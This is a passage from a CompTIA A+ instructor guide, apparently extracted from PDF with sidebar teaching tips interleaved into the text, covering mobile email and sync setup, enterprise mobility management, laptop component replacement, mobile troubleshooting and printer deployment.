that Exchange doesn't use either POP3 or IMAP (though it can support them) but a
proprietary protocol called Messaging Application Programming Interface (MAPI).
• Outgoing mail server—the address of the Simple Mail Transfer Protocol (SMTP)
server.
TLS protects confidential information such as the account password and is necessary if
you connect to mail over a public link (such as an open Wi-Fi “hotspot”). Note that you
can only enable TLS if the mail provider supports it.
• Ports—the secure (TLS enabled) or unsecure ports used for IMAP, POP3, and
SMTP would normally be left to the default. If the email provider uses custom
port settings, you would need to obtain those and enter them in the manual
configuration.
Configuring an email account manually in iOS. (Screenshot used with permission from Apple Inc.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
268 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Synchronization Methods
Show Before cloud services became prevalent, data on a smartphone or tablet would
Slide(s) typically be manually synchronized with a desktop PC. You might use the PC to back
Synchronization up data stored on the smartphone, for instance, or to sync calendar and contact
Methods records. Nowadays, it is much more likely for devices to be connected via cloud
services. If given permission, the device OS and apps can back up data to the cloud
service all the time. When you sign in to a new device, it syncs the data from the
cloud seamlessly.
Account settings for the Google master account on an Android smartphone. This account is used
for the Play Store and to sync data with other cloud services, but not email, contacts, or calendar.
(Screenshot courtesy of Android platform, a trademark of Google LLC.)
When synchronizing large amounts of data, you should account for different types
of data caps:
• The account will have an overall storage limit. Most accounts are issued with
5 GB of free tier storage. Additional storage needs to be purchased.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 269
Synchronizing to PCs
If synchronizing via a cloud service is not an option, you can usually view an Android
phone or tablet from Windows over USB or Bluetooth and use drag-and-drop for
file transfer.
Connecting an Android smartphone to a Windows PC over USB. You can choose whether to allow
some sort of data transfer as well as charge the battery. If you enable data transfer, the device's
file system will be made available via File Explorer. (Screenshot courtesy of
Android platform, a trademark of Google LLC.)
Synchronizing to Automobiles
Most new automobiles come with in-vehicle entertainment and navigation systems.
The main part of this system is referred to as the head unit. If supported, a
smartphone can be used to “drive” the head unit so the navigation features from
your smartphone will appear on the display (simplified for safe use while driving), or
you could play songs stored on your tablet via the vehicle's entertainment system.
The technologies underpinning this are Apple CarPlay and Android Auto.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
270 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Teaching Enterprises use different deployment models to specify how mobile devices and apps
Tip are provisioned to employees. One example is bring your own device (BYOD), where
BYOD is mentioned employees are allowed to use a personally owned device to access corporate accounts,
as a note as it’s in apps, and data.
the acronyms list.
You might want to There are two main functions of an EMM product suite:
mention other mobile
deployment models • Mobile device management (MDM) sets device policies for authentication,
(COPE, CYOD, and feature use (camera and microphone), and connectivity. MDM can also allow
COBO) in discussion. device resets and remote wipes.
Interaction • Mobile application management (MAM) sets policies for apps that can process
Opportunity corporate data and prevents data transfer to personal apps. This type of solution
Have students configures an enterprise-managed container or workspace.
browse some of the
links to the vendor Examples of EMM solution providers include VMWare Workspace ONE (vmware.
sites to identify the com/products/workspace-one.html), Microsoft Endpoint Manager/Intune
capabilities of these
(microsoft.com/en-us/security/business/microsoft-endpoint-manager), Symantec/
suites.
Broadcom (broadcom.com/products/cyber-security/endpoint/end-user/protection-
mobile), and Citrix Endpoint Management (citrix.com/products/citrix-endpoint-
management).
When a device is enrolled with the MAM software, it can be configured into
an enterprise workspace mode in which only a certain number of authorized
corporate applications can run. For example, the app(s) used for corporate email,
calendar, and contacts would store settings and data separately from the app used
for personal email. Messages and attachments sent from the account might be
subject to data loss prevention (DLP) controls to prevent unauthorized forwarding
of confidential or privacy-sensitive data.
Endpoint management software such as Microsoft Intune can be used to approve or prohibit apps.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 271
Apple operates enterprise developer and distribution programs to allow private app
distribution via Apple Business Manager (developer.apple.com/business/distribute).
Google's Play store has a private channel option called Managed Google Play. Both
these options allow a MAM suite to push apps from the private channel to the
device.
Two-factor Authentication
Most smartphones and tablets are single-user devices. Access control can be Show
implemented by configuring a screen lock that can only be bypassed using the Slide(s)
correct password, personal identification number (PIN), or swipe pattern. Many Two-factor
devices now support biometric authentication, usually as a fingerprint reader but Authentication
sometimes using facial or voice recognition.
Teaching
When enrolled with an enterprise management app, the user might have Tip
to re-authenticate to access the corporate workspace. The corporate policy You might want to
might require stronger authentication methods, such as the use of two-factor note that Google,
authentication (2FA). 2FA means that the user must submit two different kinds Microsoft, and some
of credential to authenticate, such as both a fingerprint and a PIN. Alternatively, other vendors refer
the account might be configured with an authenticator device or app, a trusted to this mechanism
as 2-step verification
email account, or registered phone number. When the user uses a new device
rather than 2FA. There
to access the account, or when the workspace policy requires 2FA, the user must are lots of ways of
first authenticate normally, using a fingerprint, for instance. If this is accepted, implementing this.
an email, text, or phone call is generated as a notification on the trusted You might want to
authenticator app or device. The message may include a one-time password code encourage students to
for the user to input to confirm that the sign-in attempt is legitimate. do some research on
Google Authenticator,
Microsoft
Authenticator, and
VMware Verify as
examples.
Configuring authentication and profile policies using Intune EMM. Note that the policy allows the
user to have a different type of authentication to the workspace hosting corporate apps and data.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
272 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Location Services
Show Geolocation is the use of network attributes to identify (or estimate) the physical
Slide(s) position of a device. A mobile device operates a location service to determine its
Location Services current position. The location service can make use of two systems:
• Global Positioning System (GPS) is a means of determining the device's latitude
and longitude based on information received from orbital satellites via a GPS
sensor. Note that not all mobile devices are fitted with GPS sensors.
As the location service stores highly personal data, it is only available to an app
where the user has granted specific permission to use it.
Configuring location services in iOS (left) and Android (right). (Screenshots reprinted with
permission from Apple Inc., and Android platform, a trademark of Google LLC.)
Some mobile devices are additionally fitted with a magnetometer sensor. This enables
more accurate compass directions.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 273
Review Activity:
Mobile Device Apps
7
Teaching
1. Why must a vendor account usually be configured on a smartphone? Tip
A vendor account, such as an Apple, Google, or Samsung account, is required to use Take some time at
the app store. the end of each topic
to answer questions.
2. Which types of data might require mapping between fields when syncing You can use the
review questions
between applications? for discussion in
class or set them for
Contacts and calendar items. students to complete
individually during or
3. How do you configure an autodiscover-enabled email provider on a after class.
smartphone?
Just select the provider then enter the email address. If the account is detected, you
will be prompted for the password.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
274 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 8C
Show
Slide(s) Install and Configure Laptop
Install and Configure
Laptop Hardware
Hardware
5
Teaching
Tip
CORE 1 EXAM OBJECTIVES COVERED
This objective is 1.1 Given a scenario, install and configure laptop hardware and components.
reduced in scope
compared to the
previous version of the
syllabus, which tested Laptops present fewer upgrade opportunities than desktop PCs, but there is still
complete disassembly the chance of maximizing the lifetime of a device by adding RAM or replacing the
of laptops down to DC
jack replacement.
battery or fixed disk. Also, as portable devices, laptops suffer more from wear and
tear and with a stock of replacement parts, repairs to items such as the keyboard
can be much more economical than buying a new laptop. In this topic, you will
learn best practice procedures for installing, replacing, and upgrading laptop
components
Distinctive features of a laptop computer, including the built-in screen, integrated keyboard,
touchpad pointer control, and I/O ports (on both sides and rear of chassis). (Image © 123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 275
When it comes to performing upgrades or replacing parts, there are some issues
specific to laptops that you should be aware of.
A useful tip is to take a photo of the underside of the laptop and print it out. As you
remove screws, tape them to the relevant point in your picture. This ensures you will not
lose any and will know which screw goes where. Photograph each stage of disassembly
so you know where to re-fit cables and connectors.
As with a desktop, organize parts that you remove or have ready for installation
carefully. Keep the parts away from your main work area so that you do not
damage them by mistake. Keep static-sensitive parts, such as the SSDs, memory
modules, and adapter cards, in anti-static packaging.
Battery Replacement
Portable computers can work off both building power and battery operation. Show
Slide(s)
AC Adapters Battery Replacement
To operate from building power, the laptop needs a power supply to convert Teaching
the AC supply from the power company to the DC voltages used by the laptop's Tip
components. The power supply is provided as an external AC adapter. AC adapters Not all AC adapters
are normally universal (or auto-switching) and can operate from any 110–240 VAC and batteries are
50/60 Hz supply, though do check the label to confirm. created equal. Point
out that the size and
shape of DC jacks
and laptop batteries
vary greatly even
between laptop
models from the
same manufacturer.
Also note that not
all laptops have field
replaceable batteries
these days.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
276 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Plugging a fixed-input 220–240 V adapter into a 110–120 V supply won't cause any
damage (though the laptop won't work), but plugging a fixed-input 110–120 V adapter
into a 220–240 V supply will likely cause damage.
AC adapters are also rated for their power output (ranging from around 65–120 W).
Again, this information will be printed on the adapter label. The AC adapter
connects to the laptop via a DC jack or a USB port.
Battery Power
Laptop computers use removable, rechargeable Lithium ion (Li-ion) battery packs.
Li-ion batteries are typically available in 6-, 9-, or 12-cell versions, with more cells
providing for a longer charge. The connector and battery-pack form factor are
typically specific to the laptop vendor and to a range/model.
Before inserting or removing the battery pack, you must turn the machine off and
unplug it from the AC wall outlet. A portable battery is usually removed by releasing
catches on the back or underside of the laptop.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 277
The battery recharges when the laptop is connected to the AC adapter and is
connected to power. When the laptop is in use, the battery is trickle charged. A
laptop should come with a power management driver to ensure a proper charging
regime and prevent repeated trickle charging from damaging it. Li-on battery life
is affected by being fully drained of charge and by being held continually at 100%
charge. Balanced power charging stops trickle charging at 80%. Li-ion batteries are
also sensitive to heat. If storing a Li-ion battery, reduce the charge to 40% and store
at below 20ºC.
Customization in MyASUS V3.1.0.0. MyASUS laptop app with customizable power plans. Balanced
mode prevents the battery from being continually trickle charged to 100%, which can reduce its
operational life. (Screenshot used with permission from ASUSTek Computer Inc.)
Li-ion batteries hold less charge as they age and typically have a maximum usable life
of around 2–3 years. If you charge a battery and the run time is substantially decreased,
you may need to purchase a new battery.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
278 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Interaction
Opportunity
If you can provide
examples of devices
with the different
connector types
exposed, that will
help students'
understanding. If not,
get them to search for
images of the different
slot types.
Two SODIMM RAM modules. The modules stack one over the other. When the side catches are
released, the modules pop up at an angle for easy removal. (Image courtesy of CompTIA.)
A SODIMM slot pops-up at a 45º angle to allow the chips to be inserted or removed.
Sometimes one of the memory slots is easily accessible via a panel, but another
requires more extensive disassembly of the chassis to access.
There are a couple of other laptop memory module form factors, including Mini-DIMM
and Micro-DIMM. These are smaller than SODIMM and used on some ultraportable
models. Always check the vendor documentation before obtaining parts for upgrade or
replacement.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 279
Wi-Fi adapter installed as a mini PCIe card. Note the antenna wire connections.
(Image courtesy of CompTIA.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
280 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The fixed disk can usually be accessed via a panel, but you may have to open the
chassis on some models.
Laptop HDDs are usually 2.5″ form factor, though sometimes the 1.8″ form factor
is used. Compared to 3.5″ desktop versions, magnetic 2.5″ HDDs tend to be slower
(usually 5400 rpm models) and lower capacity. Within the 2.5″ form factor, there are
also reduced height units designed for ultraportable laptops. A standard 2.5″ drive
has a z-height of 9.5 mm; an ultraportable laptop might require a 7 mm (thin) or
5 mm (ultrathin) drive.
Magnetic drives use ordinary SATA data and power connectors, though the
connectors on the drive mate directly to a port in the drive bay, without the use of a
cable. Drive bays measuring 1.8″ might require the use of the micro SATA (μSATA or
uSATA) connector.
An SSD flash storage device can also use the SATA interface and connector form
factors but is more likely to use an adapter card interface:
• mSATA—An SSD might be housed on a card with a Mini-SATA (mSATA) interface.
These cards resemble Mini PCIe cards but are not physically compatible with
Mini PCIe slots. mSATA uses the SATA bus, so the maximum transfer speed is
6 Gb/s.
• M.2—An M.2 SSD usually interfaces with the PCI Express bus, allowing much
higher bus speeds than SATA. M.2 adapters can be different lengths (42 mm,
60 mm, 80 mm, or 110 mm), so you should check that any given adapter will fit
within the laptop chassis. The most popular length for laptop SSDs is 80 mm
(M.2 2280).
The specific M.2 form factor is written as xxyy, where xx is the card width and yy is the
length. For example, 2280 means a card width of 22 mm and a length of 80 mm.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 281
When you are replacing components such as the keyboard and touchpad, you Teaching
will almost always need to use the same part as was fitted originally. Accessing Tip
the parts for removal and replacement might require complete disassembly of the Explain that specific
chassis or might be relatively straightforward—check the service documentation. details of how
the keyboard/
Each part connects to the motherboard via a data cable, typically a flat ribbon type. touchpad/biometrics
The cable is held in place by a latch that must be released before trying to remove components are
the cable and secured after insertion. provisioned is vendor-
and model-specific.
When replacing an input device, use the OS/driver settings utility or app to They might be
configure it. A keyboard should be set to the correct input region. Touchpads need separate components
to be configured to an appropriate sensitivity to be comfortable for the user. or be functions of an
integrated device.
Remind students that
Key Replacement they must consult the
system documentation
In some circumstances, it might be economical to lift a single key for cleaning or before proceeding.
replacement. Carefully pry off the plastic key cap with a flat blade to expose the
retainer clip. The retainer clip can also be removed for cleaning, but it is fragile so
take care. To replace, line up each component carefully and then push to snap it
back into place.
Near-field Scanner
A near-field communication (NFC) scanner on a laptop is primarily used to pair
peripheral devices or to establish a connection to a smartphone. This is configured
via the vendor’s app.
NFC might be implemented as a feature of the keyboard, touchpad, or fingerprint
reader. As well as the data connection to the motherboard, the NFC sensor must be
connected to its antenna.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
282 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Laptop Hardware
6
Teaching
1. Several laptops need to be replaced in the next fiscal cycle, but that
Tip
doesn't begin for several months. You want to improve functionality as
Take some time at much as possible by upgrading or replacing components in some of the
the end of each topic
laptops that are having problems. Which items are most easily replaced
to answer questions.
You can use the in a laptop?
review questions
for discussion in The fixed drive, system memory (RAM), and plug-in wireless card will be the
class or set them for easiest upgradable components to install. If items need repairing, the battery,
students to complete touchpad, and the keyboard should be straightforward to replace, if you can obtain
individually during or compatible parts.
after class.
2. What is the process for installing memory in a laptop?
Verify that the DDR version of the upgrade module is supported by the
motherboard. Take anti-static precautions. Locate the memory slot, which is usually
accessed via a panel on the back cover. Move the connector up to 45º and insert the
memory card, taking care to align it correctly. Push the card flat again.
This type of flat data connector is secured by a latch. Pop the latch up before trying
to remove the cable.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 283
Topic 8D
Troubleshoot Mobile Device Issues
5
If a mobile device will not power on when disconnected from building power, first
check that the battery is seated properly in its compartment. Also check whether
the battery contacts are dirty. You can clean them using swabs.
If the battery is properly inserted and the mobile device does not switch on or only
remains on for a few seconds, it is most likely completely discharged. A battery
exhibiting poor health will not hold a charge. This means that the battery is at the
end of its useful life. You can test this by using a known good battery. If a known
good battery does not work, then there is something wrong with the power circuitry
on the motherboard.
While laptop batteries are replaceable, few smartphones or tablets come with
removable battery packs. Most vendors try to design their devices so that they
will support “typical” usage for a full day without charging. As the battery ages, it
becomes less able to hold a full charge. If it is non-removable, the device will have
to be returned to the vendor for battery replacement.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
284 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Mobile handset with cover removed—the battery is accessible but not designated as
user-removable. (Image by guruxox © 123RF.com)
Exercise caution when leaving batteries to recharge unattended (for example, overnight).
Do not leave a battery charger close to flammable material, and ensure there is plenty
of ventilation around the unit.
An improper charging routine will reduce the usable life of a battery. Follow
manufacturer instructions on the proper charging and discharging of the battery.
Make use of power management features included with your device/OS to prolong
battery life. A Li-ion battery should not be allowed to fully discharge regularly or be
kept persistently at 100% charge, as this reduces battery life.
As batteries age, the maximum charge they can sustain decreases, so short battery
life will usually indicate that the battery needs replacing. If the battery is not old or
faulty, you could suspect that an app is putting excessive strain on the battery. You
can use an app to check battery utilization.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 285
Battery status and notifications in iOS (left) and Android (right). (Screenshots reprinted with
permission from Apple Inc., and Android platform, a trademark of Google LLC.)
Manufacturing defects in batteries and AC adapters often occur in batches. Make sure
you remain signed up to the vendor's alerting service so that you are informed about
any product recalls or safety advisories.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
286 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 287
As well as the display itself, it is common for the plastics around a laptop case to get
cracked or broken and for the hinges on the lid to wear out. The plastics are mostly
cosmetic (though a bad break might expose the laptop's internal components to greater
risks), but if the hinges no longer hold up the screen, they will have to be replaced.
If there are no visible cracks, the screen or digitizer circuitry may have been damaged
by liquid.
Digitizer Issues
Symptoms such as the touch screen not responding to input indicate a problem
with the digitizer. If you can discount shock and liquid damage, try the following
tests:
• Verify that the touchscreen and the user’s fingers are clean and dry.
• If a screen protector is fitted, check that it is securely adhered to the surface and
that there are no bubbles or lifts.
• Check that there is not a transitory software problem by restarting the device.
Holding the power button (Android) or Sleep and Home buttons (iPhone) for a
few seconds will force the device to perform a soft reset.
• If the device has just been serviced, check that the right wires are still connected
in the right places for the digitizer to function. Remember to ask, “What has
changed?”
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
288 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Connectivity Issues
Show Wi-Fi and Bluetooth connectivity issues on a mobile can be approached in
Slide(s) much the same way as on a PC. Problems can generally be categorized as either
Connectivity Issues
relating to “physical” issues, such as interference, or to “software” configuration
problems.
Consider these guidelines when you are troubleshooting issues with
communication and connectivity:
• Verify that the adapter is enabled. Check the status of function key toggles on
a laptop, or use the notification shade toggles on a mobile device to check
that airplane mode has not been enabled or that the specific radio is not
disabled.
• If a laptop has been serviced recently and wireless functions have stopped
working, check that the antenna connector has not been dislodged or wrongly
connected.
• If you experience problems restoring from hibernate or sleep mode, try cycling
the power on the device or reconnecting it and checking for updated drivers for
the wireless controller and the devices.
The radio antenna wire for a mobile will be built into the case (normally around the
screen). On some devices, certain hand positions can stop the antenna from functioning
as well as it should.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 289
Network Cell Info Lite showing cell tower connection status in the top gauge and Wi-Fi in the
lower gauge. (Screenshot used with permission from M2Catalyst, LLC).
A similar utility (Cell Tower Analyzer or GSM Signal Monitor) can be used to analyze
cellular radio signals, which use different frequencies than Wi-Fi uses. An app might
combine both functions.
Malware Issues
Whenever a device does not function as expected, you should assess whether it Show
could be infected with malware. Consider the following scenarios: Slide(s)
• Malware or rogue apps are likely to try to collect data in the background. They Malware Issues
can become unresponsive and might not shut down when closed. Such apps Teaching
might cause excessive power drain and high resource utilization, potentially Tip
leading to overheating problems.
Note that malware is
covered in much more
• Another tell-tale sign of a hacked device is reaching the data transmission
detail in the Core 2
overlimit unexpectedly. Most devices have an option to monitor data usage and course.
have limit triggers to notify the user if the limit has been reached. This protects
from large data bills but should also prompt the user to check the amount of
data used by each application in order to monitor their legitimacy.
• Malware may try to use the camera or microphone to record activity. Check that
the camera LED is not activated.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
290 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
6
Mobile Device Issues
Show Answer the following questions:
Slide(s)
Review
Teaching
Tip
1. You are troubleshooting a laptop display. If the laptop can display
an image on an external monitor but not on the built-in one, which
Take some time at
the end of each topic
component do you know is working, and can you definitively say which is
to answer questions. faulty?
You can use the
review questions The graphics adapter is working. The problem must exist either in the cabling to the
for discussion in built-in screen or with a screen component, such as an inverter, backlight, or the
class or set them for display panel itself. Further tests will be required to identify which.
students to complete
individually during or 2. You received a user complaint about a laptop being extremely hot to the
after class. touch. What actions should you take in response to this issue?
Overheating can be a sign that dust and dirt is restricting the necessary airflow
within the device, so start by cleaning the ventilation duct with compressed air, and
then make sure that the device is getting proper air circulation around the outside
of the case, such as by supplying a chiller pad.
3. A user complains that their Bluetooth keyboard, which has worked for
the last year, has stopped functioning. What would you suggest is the
problem?
4. A laptop user reports that they are only getting about two hours of use
out of the battery compared to about three hours when the laptop was
first supplied to them. What do you suggest?
Batteries lose maximum charge over time. It may be possible to recondition the
battery or to use power-saving features, but the only real way to restore maximum
battery life is to buy a new battery.
The user could be touching the touchpad while typing, or vibrations could be
affecting the touchpad. Update the driver or reduce the sensitivity/disable touch
and tap events.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 291
Lesson 8
Summary
6
• Create work instructions and prepare inventory to support laptop repair and
upgrade tasks, such as battery, keyboard/keys, RAM, HDD/SSD migration,
wireless cards, and biometric/NFC security components.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 9
Supporting Print Devices
1
LESSON INTRODUCTION
Despite predictions that computers would bring about a paperless office Show
environment, the need to transfer digital information to paper or back again Slide(s)
remains strong. As a CompTIA® A+® certified professional, you will often be called Objectives
upon to set up, configure, and troubleshoot print and scan devices. Having a
working knowledge of the many printer technologies and components will help you Teaching
to support users’ needs in any technical environment. Tip
We conclude the
Lesson Objectives Core 1 course by
looking at print
device configuration,
In this lesson, you will: maintenance, and
• Deploy printer and multifunction devices. troubleshooting. While
office printing is less
• Replace print device consumables. prevalent than it used
to be, print devices
• Troubleshoot print device issues. are critical to many
industries (receipt
printing, for instance)
and 3-D printing is
becoming much more
widely adopted.
This is another
section where at least
some knowledge of
Windows is assumed.
You might want to
consider trying to
complete Core 2
before discussing
printing.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
294 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 9A
Deploy Printer and
Multifunction Devices
2
• Paper handling means the sizes and types of paper or media that can be loaded. It
may be important that the printer can handle labels, envelopes, card stock, acetate/
transparencies, and so on. The amount of paper that can be loaded and output is
also important in high-volume environments. Overloaded output trays will cause
paper jams. If the output tray is low capacity, this could happen quite quickly in a
busy office.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 295
• Options add functionality. Examples include an automatic duplex unit for double-
sided printing and a finisher unit for folding, stapling, and hole punching. These may
be fitted by default or available for purchase as an add-on component.
Setup Location
When deploying a new print device, consider the following factors to select an
optimum setup location:
• The print device must have a power outlet and potentially a network data port.
Ensure that cables are run without being trip hazards and that the print device
is placed on a stable, flat surface that can bear the device weight with no risk of
toppling.
• As with a PC, ensure that the print device is not exposed to direct sunlight and
that there is space around it for air to flow. The area should be well-ventilated
to ensure dispersal of fumes such as ozone generated during printer operation.
Printer paper and most consumables should be stored where there is no risk of
high humidity or temperature extremes. Consult the material safety data sheet
(MSDS) accompanying the print device to check for any other special installation
considerations.
• The print device should be accessible to its users, but take account of noise
and foot traffic that might be disruptive to employees working at nearby desks.
If a print device is used to output confidential information, it may need to be
installed in an access-controlled area.
Unboxing
When you have selected an installation location, follow the manufacturer’s
instructions to unbox and set up the printer. Be aware of the following general
factors:
• Many print devices are heavy and may require two persons to lift safely. Make
sure you use safe lifting techniques and bend at the knees to avoid damaging
your back. Identify handle locations on the device, and use only those to grip and
lift it. If carrying a bulky device, ensure the path is free from trip hazards.
• Printer parts will be secured using packing strips and supports. Ensure that these
are all removed before the printer is switched on. Remember to check for strips
on removable components that are concealed by panels.
• A print device should normally be left to acclimate after removing the packaging
materials. Leave the device unboxed and powered off for a few hours to reduce
risks from condensation forming within an appliance that has moved from a cold
storage/transport environment to a warmer installation environment. Similarly,
printer paper should be stored for a day or more before use to allow it to adjust
to the temperature and humidity of the installation location.
Show
Slide(s)
Print Device Connectivity Print Device
Connectivity
Each print device supports a range of wired and wireless connection interfaces.
Teaching
USB Print Device Connectivity Tip
Install a printer with USB connectivity, connect the device plug (usually a Type B Note that a printer’s
wireless connection
connector) to the printer’s USB port and the Type A host plug to a free port on the
can either be
computer. In most cases, the OS will detect the printer using Plug and Play and configured as joining
install the driver automatically. You can confirm that the printer is successfully a WLAN or as Wi-Fi
installed and print a test page using the driver or OS utility. direct (creating a PAN).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
296 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Setting the IP address configuration method via the printer's control panel.
(Image courtesy of CompTIA.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 297
This method is suitable for small office environments where you have few printers
to manage. It is also useful in troubleshooting situations when the printer is
inaccessible from the network. However, the printer vendor will usually supply a
web-based utility to discover and manage its printers, whereas more advanced
management suites are available for enterprise networks.
The printer will need to communicate with computers over one or more TCP or
UDP network ports. If a network connection cannot be established, verify that these
ports are not being blocked by a firewall or other security software.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
298 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using the printer control panel to verify Wi-Fi connection status in infrastructure mode.
(Image courtesy of CompTIA.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 299
• Vector graphics—as with fonts, scalable images are built from vectors, which
describe how a line should be drawn rather than provide a pixel-by-pixel
description, as is the case with bitmap graphics.
• Color printing—computer displays use an additive red, green, blue color model.
The subtractive model used by print devices uses the reflective properties of
cyan, magenta, yellow, and black (CMYK) inks. A PDL’s support for a particular
color model provides an accurate translation between on-screen color and print
output and ensures that different d evices produce identical output.
The "K" in CMYK is usually explained as standing for "key," as in a key plate used to align
the other plates in the sort of offset print press used for professional color printing in
high volumes. It might be more helpful to think of it as "blacK," though.
The choice of which PDL to use will largely be driven by compatibility with software
applications. Adobe PostScript is a device independent PDL and often used for
professional desktop publishing and graphical design output. HP’s Printer Control
Language (PCL) is more closely tied to individual features of printer models and
can introduce some variation in output depending on the print device. PCL is
usually a bit faster than PostScript, however. Many Windows print devices default to
using Microsoft’s XML paper specification (XPS) PDL.
A print device might support more than one PDL—this HP printer supports both Printer Control
Language (PCL) and PostScript (PS). (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
300 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Printer Properties
Show Each logical printer object can be set up with default configuration settings via its
Slide(s) driver or app.
Printer Properties
Teaching
Tip
Make sure students
can distinguish
between options set
as printer properties
and options set as
printing preferences.
Viewing the print queue and configuring preferences through the Printers and Scanners Settings
app page. (Screenshot courtesy of Microsoft.)
In Windows, there are two main configuration dialogs for a local printer: Printer
Properties and Printing Preferences.
A printer’s Properties dialog allows you to manage configuration settings for the
printer object and the underlying hardware, such as updating the driver, printing
to a different port, sharing and permissions, setting basic device options (such as
whether a duplex unit or finisher unit is installed), and configuring default paper
types for different feed trays.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 301
The About tab contains information about the driver and the printer vendor and
may include links to support and troubleshooting tips and utilities.
Printing Preferences
In contrast to the Properties dialog box, the Preferences dialog sets the default Show
print job options, such as the type and orientation of paper or whether to print in Slide(s)
color or black and white. These settings can also be changed on a per-job basis by Printing Preferences
selecting the Properties button in the application’s Print dialog. Alternatively, the
printer may come with management software that you can use to change settings. Teaching
